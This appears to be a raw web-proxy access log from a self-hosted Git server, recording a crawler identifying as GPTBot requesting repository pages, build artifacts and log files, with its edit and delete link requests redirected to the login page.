"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:43:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:43:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 2437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 159348] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:43:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:43:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:43:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:43:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:43:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:43:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:43:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:43:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 21360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 3774907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 2931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 158478] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 21088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 2435] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 1405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 2435] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10965] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9938] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11491] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10311] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11171] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10270] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15264] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15264] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11492] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13302] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13303] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11168] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11491] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33667] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10013] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33375] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr 